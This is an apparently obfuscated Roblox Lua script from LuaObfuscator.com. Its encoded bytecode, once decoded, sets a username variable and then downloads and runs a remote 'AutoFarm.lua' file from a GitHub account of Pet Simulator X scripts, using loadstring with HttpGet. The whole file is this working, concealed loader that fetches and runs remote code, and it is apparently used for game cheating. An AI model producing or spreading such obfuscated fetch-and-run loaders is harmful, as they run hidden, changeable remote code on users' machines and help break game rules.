--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v30=nil;function v30(v31,v32,v33)local v34=0;local v35;local v36;local v37;while true do if (v34==0) then v35=v31[1];v36=v31[2];v34=1;end if (1==v34) then v37=v31[3];return function(...)local v79=1;local v80= -1;local v81={...};local v82=v12("#",...) -1 ;local function v83()local v85=v35;local v86=v36;local v87=v37;local v88=v28;local v89={};local v90={};local v91={};for v95=0 + 0 ,v82 do if ((v95>=v87) or ((6511 -4029)>=(1322 + 1599))) then v89[v95-v87 ]=v81[v95 + 1 + 0 ];else v91[v95]=v81[v95 + 1 ];end end local v92=(v82-v87) + (3 -2) ;local v93;local v94;while true do local v96=177 -(115 + (131 -69)) ;while true do if (((1861 -(420 + 58))<(1961 + 796)) and (v96==((658 -(642 + 16)) + 0))) then local v104=0 -0 ;while true do if ((v104==(0 -0)) or ((2171 -1174)==(3597 + 413))) then v93=v85[v79];v94=v93[1 + 0 ];v104=1;end if ((((643 + 780) -(161 + 75))>(623 + 196)) and (v104==((5736 -4138) -(577 + 1020)))) then v96=101 -(37 + 63) ;break;end end end if (((2416 + 1595 + 958)>((6487 -(547 + 190)) -(110 + 1414))) and (v96==(4 -3))) then if (((1118 -693)<=(8682 -4763)) and (v94<=3)) then if (((3015 -1635)>(694 + 457)) and (v94<=((1529 + 189) -(458 + 1259)))) then if (((1177 -(648 + 392))<2944) and (v94>(0 -0))) then v91[v93[2]][v93[3]]=v93[1058 -(436 + 618) ];else local v118=0;local v119;local v120;local v121;local v122;local v123;while true do if (((682 + 1205 + 1795)>=2107) and ((0 -0)==v118)) then v119=0;v120=nil;v118=2 -1 ;end if ((v118==1) or ((3395 -2131)>(2304 -(404 + 55)))) then v121=nil;v122=nil;v118=257 -(70 + 185) ;end if ((v118==(602 -(331 + 269))) or (4163>((20380 -14896) -(880 + 92)))) then v123=nil;while true do if ((((8434 + 2160) -(12869 -5509))>(4022 -2320)) and (v119==2)) then for v158=v120,v80 do local v159=0;local v160;local v161;while true do if (((1026 -(548 + 260))<=(6659 -4448)) and (v159==(779 -(121 + 657)))) then while true do if (((0 + 0)==v160) or ((2589 -(707 + 339))==((10930 -6023) -(805 + 72)))) then v161=0;while true do if ((v161==0) or ((7382 -(2094 + 956))>=(379 + 4127))) then v123=v123 + (987 -((1405 -(424 + 710)) + 715)) ;v91[v158]=v121[v123];break;end end break;end end break;end if (((15555 -11109)>=(1787 + 1939)) and (v159==(1039 -(657 + 382)))) then v160=0;v161=nil;v159=1 + 0 ;end end end break;end if ((v119==(1199 -(724 + 474))) or ((43 + 47 + 132)>=(5744 -(858 + 1053)))) then local v149=0 + 0 + 0 ;while true do if ((2117==(3077 -(175 + 785))) and (v149==0)) then v80=(v122 + v120) -((3 -2) + 0) ;v123=106 -(39 + 67) ;v149=1;end if ((v149==((4 -3) + 0)) or (4471<(4322 -(1338 + 399)))) then v119=528 -(182 + 344) ;break;end end end if (((10566 -6172)<=(3325 + (3291 -(1468 + 473)))) and (v119==(0 -0))) then local v150=0 -0 ;while true do if ((((2859 -2136) + 3721)>(10268 -(5964 + 1080))) and (v150==(1 + 0 + 0))) then v119=1;break;end if ((v150==(1954 -(1569 + 385))) or ((7027 -3393)<(1262 + (3340 -1267)))) then v120=v93[2];v121,v122=v88(v91[v120](v13(v91,v120 + 1 + 0 ,v93[3])));v150=1 + 0 ;end end end end break;end end end elseif (((404 + 4476)<(2584 + 2382)) and (v94==(9 -7))) then local v124=0;local v125;local v126;while true do if ((v124==0) or ((2482 -1511)>(1644 + 683))) then local v142=0 -0 ;while true do if ((v142==((0 + 0) -0)) or ((1698 -1092)==(702 + 4100))) then v125=v93[2 + 0 ];v126=v91[v93[885 -(147 + 735) ]];v142=249 -(132 + 116) ;end if (((209 -133)<=((6128 -(355 + 219)) -(31 + 758))) and (v142==(1 + 0))) then v124=1454 -(944 + 509) ;break;end end end if (((487 + 381)>831) and (v124==(272 -(175 + 96)))) then v91[v125 + 1 ]=v126;v91[v125]=v126[v93[(41 + 64) -(65 + 36) ]];break;end end else local v127=215 -(84 + 131) ;local v128;while true do if ((((1330 -(445 + 232)) + 2300)>(644 + 242)) and (v127==((986 + 532) -(474 + 1044)))) then v128=v93[4 -(3 -1) ];v91[v128]=v91[v128](v13(v91,v128 + (4 -3) ,v80));break;end end end elseif ((v94<=(646 -(257 + 384))) or ((3395 -2006)==3797)) then if (((3056 -1191)>=(2893 -2306)) and (v94==(425 -(51 + 370)))) then v91[v93[1 + 1 ]]=v93[3]~=(0 + 0 + 0) ;else v91[v93[360 -(90 + 268) ]]();end elseif ((v94<=(6 + 0)) or ((3570 -1795)<(986 + 554))) then v91[v93[1253 -(856 + 395) ]]=v93[3 + 0 ];elseif (((90 + 151)==241) and (v94==(27 -20))) then v91[v93[1 + 1 ]]=v33[v93[3]];else do return;end end v79=v79 + (2 -1) ;break;end end end end A,B=v28(v11(v83));if  not A[1] then local v97=v31[4][v79] or "?" ;error("Script error at ["   .. v97   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end end end return v30(v29(),{},v17)(...);end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v38)if (v1(v38,2)==79) then v20=v0(v3(v38,1,1));return "";else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v38,16));if v20 then local v98=v5(v71,v20);v20=nil;return v98;else return v71;end break;end end end end);v21=nil;v18=1;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v39~=(2 + 2)) then else while true do if (v40==(0 + 0)) then v41=0 -0 ;v42=nil;v40=3 -2 ;end if (v40~=3) then else v47=nil;while true do local v99=0;while true do if (v99~=(1 + 0)) then else if (v41~=0) then else local v107=0 -0 ;while true do if (v107==2) then v41=1 -0 ;break;end if (v107~=(0 + 0)) then else v42={};v43={};v107=3 -2 ;end if (v107~=1) then else local v132=0 -0 ;while true do if (v132~=(1 -0)) then else v107=2;break;end if ((0 + 0)==v132) then v44={};v45={v42,v43,nil,v44};v132=24 -(13 + 10) ;end end end end end break;end if (v99==(976 -(509 + 467))) then if (v41==(1 -0)) then v46=v24();v47={};for v110=3 -2 ,v46 do local v111=753 -(736 + 17) ;local v112;local v113;local v114;local v115;while true do if (0~=v111) then else v112=0;v113=nil;v111=1;end if (v111~=(1 + 1)) then else while true do if (v112==(0 + 0)) then local v148=0 + 0 ;while true do if (v148~=(0 + 0)) then else local v162=0 -0 ;while true do if (v162==(0 -0)) then v113=0;v114=nil;v162=1 -0 ;end if (v162~=(2 -1)) then else v148=758 -(725 + 32) ;break;end end end if (v148==(1534 -(926 + 607))) then v112=1 + 0 ;break;end end end if (v112==1) then v115=nil;while true do if ((0 -0)~=v113) then else local v163=0 + 0 ;local v164;local v165;while true do if (v163==(1 + 0)) then while true do if (v164~=(0 -0)) then else v165=0 -0 ;while true do if (v165==(0 + 0)) then local v182=1588 -(963 + 625) ;while true do if (v182==(0 + 0)) then v114=v22();v115=nil;v182=1;end if (v182~=(1368 -(96 + 1271))) then else v165=1 + 0 ;break;end end end if (v165~=(882 -(72 + 809))) then else v113=1 + 0 ;break;end end break;end end break;end if (v163==(430 -(82 + 348))) then v164=0 + 0 ;v165=nil;v163=1 + 0 ;end end end if (v113~=1) then else if (v114==(2 -1)) then v115=v22()~=0 ;elseif (v114==2) then v115=v25();elseif (v114==(770 -(573 + 194))) then v115=v26();end v47[v110]=v115;break;end end break;end end break;end if (v111==(2 -1)) then v114=nil;v115=nil;v111=287 -(188 + 97) ;end end end v45[3]=v22();v41=3 -1 ;end if ((8 -6)~=v41) then else local v109=0 + 0 ;while true do if (v109~=(888 -(7 + 881))) then else for v133=1246 -(474 + 771) ,v24() do local v134=1632 -(768 + 864) ;local v135;while true do if (v134~=0) then else v135=v22();if (v21(v135,1 + 0 ,1 + 0 )~=0) then else local v153=1413 -(876 + 537) ;local v154;local v155;local v156;local v157;while true do if (v153~=(0 + 0)) then else local v168=1688 -(53 + 1635) ;local v169;while true do if (v168~=(0 -0)) then else v169=0 -0 ;while true do if (v169==(1018 -(132 + 885))) then v153=1 -0 ;break;end if (v169==(178 -(120 + 58))) then v154=0;v155=nil;v169=1;end end break;end end end if (v153~=(1981 -(242 + 1738))) then else v156=nil;v157=nil;v153=1 + 1 ;end if (v153~=(235 -(84 + 149))) then else while true do if (v154~=(1773 -(1696 + 76))) then else local v170=0;local v171;local v172;while true do if (v170~=(1 + 0)) then else while true do if (v171==0) then v172=0 + 0 ;while true do if (v172==(1 -0)) then v154=1 + 1 ;break;end if (v172~=(0 -0)) then else v157={v23(),v23(),nil,nil};if (v155==(591 -(316 + 275))) then local v186=0 -0 ;local v187;while true do if (v186~=(0 + 0)) then else v187=0;while true do if (v187==(0 -0)) then v157[7 -4 ]=v23();v157[1 + 3 ]=v23();break;end end break;end end elseif (v155==1) then v157[8 -5 ]=v24();elseif (v155==(2 + 0)) then v157[1800 -(290 + 1507) ]=v24() -((1 + 1)^(9 + 7)) ;elseif (v155~=3) then else local v193=637 -(340 + 297) ;local v194;local v195;while true do if (v193~=(0 -0)) then else v194=0 -0 ;v195=nil;v193=1 + 0 ;end if ((1 + 0)==v193) then while true do if (v194~=(0 -0)) then else v195=0 -0 ;while true do if (v195==(0 -0)) then v157[3 + 0 ]=v24() -((243 -(36 + 205))^16) ;v157[2 + 2 ]=v23();break;end end break;end end break;end end end v172=1 -0 ;end end break;end end break;end if (0==v170) then v171=0;v172=nil;v170=789 -(694 + 94) ;end end end if (v154~=2) then else local v173=0 + 0 ;local v174;while true do if ((1511 -(884 + 627))~=v173) then else v174=277 -(52 + 225) ;while true do if (v174==(1 + 0)) then v154=1219 -(331 + 885) ;break;end if (v174~=0) then else local v183=555 -(40 + 515) ;local v184;while true do if (v183~=(0 -0)) then else v184=0;while true do if (v184~=(0 -0)) then else local v188=0;while true do if (v188==(1 + 0)) then v184=1;break;end if (v188~=(0 -0)) then else if (v21(v156,1,2 -1 )==1) then v157[7 -5 ]=v47[v157[2]];end if (v21(v156,1083 -(494 + 587) ,1 + 1 )~=1) then else v157[3]=v47[v157[1495 -(1322 + 170) ]];end v188=1 + 0 ;end end end if (v184==(1 + 0)) then v174=1 + 0 ;break;end end break;end end end end break;end end end if (0~=v154) then else local v175=0;local v176;while true do if ((596 -(378 + 218))~=v175) then else v176=0 -0 ;while true do if (v176~=1) then else v154=1 -0 ;break;end if (v176~=(1062 -(718 + 344))) then else local v185=0 -0 ;while true do if (v185==(1 + 0)) then v176=1 + 0 ;break;end if (v185==0) then v155=v21(v135,2,3);v156=v21(v135,4 + 0 ,17 -11 );v185=1351 -(1156 + 194) ;end end end end break;end end end if (v154~=3) then else if (v21(v156,3,3)==(363 -(198 + 164))) then v157[1992 -(1676 + 312) ]=v47[v157[14 -10 ]];end v42[v133]=v157;break;end end break;end end end break;end end end for v136=1 + 0 ,v24() do v43[v136-(2 -1) ]=v29();end v109=25 -(8 + 16) ;end if (v109==(1 + 0)) then for v138=1667 -(1019 + 647) ,v24() do v44[v138]=v24();end return v45;end end end v99=378 -(89 + 288) ;end end end break;end if (v40~=(1 + 0)) then else v43=nil;v44=nil;v40=2;end if (v40==(6 -4)) then v45=nil;v46=nil;v40=6 -3 ;end end break;end if ((4 -1)==v39) then v46=nil;v47=nil;v39=2 + 2 ;end if (v39==(0 -0)) then v40=0;v41=nil;v39=1;end if (v39~=(4 -2)) then else v44=nil;v45=nil;v39=3;end if (v39~=(1 + 0)) then else v42=nil;v43=nil;v39=9 -7 ;end end end v18=5;end if (v18==1) then function v21(v48,v49,v50)if v50 then local v72=0 -(0 -0) ;local v73;while true do if (v72==(0 + 0)) then v73=(v48/((676 -(664 + (27 -17)))^(v49-(1 + (0 -0)))))%(((3731 -(1029 + 812)) -((1648 -(350 + 1263)) + 1853))^(((v50-(3 -(2 + 0))) -(v49-(1 + 0))) + (1598 -(1570 + 27)))) ;return v73-(v73%1) ;end end else local v74=0 + 0 ;local v75;while true do if (v74==(1390 -(596 + 794))) then v75=2^(v49-(647 -(587 + 59))) ;return (((v48%(v75 + v75))>=v75) and 1) or 0 ;end end end end v22=nil;function v22()local v51=v1(v16,v19,v19);v19=v19 + 1 ;return v51;end v23=nil;v18=2;end if (v18==2) then function v23()local v52=0 -0 ;local v53;local v54;while true do if (v52==(1 -0)) then return (v54 * (449 -193)) + v53 ;end if (v52==(0 -0)) then v53,v54=v1(v16,v19,v19 + 2 + 0 );v19=v19 + ((4313 -2401) -(660 + 1250)) ;v52=1 + 0 ;end end end v24=nil;function v24()local v55,v56,v57,v58=v1(v16,v19,v19 + 3 );v19=v19 + (6 -2) ;return (v58 * (16778684 -(258 + 1210))) + (v57 * (13646 + 51890)) + (v56 * 256) + v55 ;end v25=nil;v18=3;end if (v18==3) then function v25()local v59=v24();local v60=v24();local v61=2 -1 ;local v62=(v21(v60,4 -(1347 -(1059 + 285)) ,84 -64 ) * ((2 -(0 + 0))^(84 -52))) + v59 ;local v63=v21(v60,18 + (337 -(161 + 173)) ,31);local v64=((v21(v60,32)==((757 -(622 + 133)) -1)) and  -1) or (1109 -(482 + 626)) ;if (v63==(0 + 0)) then if (v62==((540 -(220 + 320)) -0)) then return v64 * 0 ;else local v84=0 + 0 ;while true do if (v84==0) then v63=1;v61=(2418 -(1238 + 752)) -(204 + 224) ;break;end end end elseif (v63==(3650 -1603)) then return ((v62==0) and (v64 * ((2 -1)/(0 -0)))) or (v64 * NaN) ;end return v8(v64,v63-(740 + 283) ) * (v61 + (v62/((3 -1)^(1169 -((963 -603) + 757))))) ;end v26=nil;function v26(v65)local v66;if  not v65 then v65=v24();if (v65==(0 + 0)) then return "";end end v66=v3(v16,v19,(v19 + v65) -1 );v19=v19 + v65 ;local v67={};for v68=1 + 0 , #v66 do v67[v68]=v2(v1(v3(v66,v68,v68)));end return v6(v67);end v27=v24;v18=4;end end end v15("LOL!073O0003023O005F4703083O00557365724E616D65030C3O004C6567616479506C61796572030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F7258536372697074732F6D61696E2F4175746F4661726D2E6C7561000B3O0012073O00013O0030013O000200030012073O00043O001207000100053O002002000100010006001206000300074O0004000400016O000100044O00035O00022O00053O000100012O00083O00017O000B3O00023O00023O00033O00033O00033O00033O00033O00033O00033O00033O00043O00",v9(),...);end
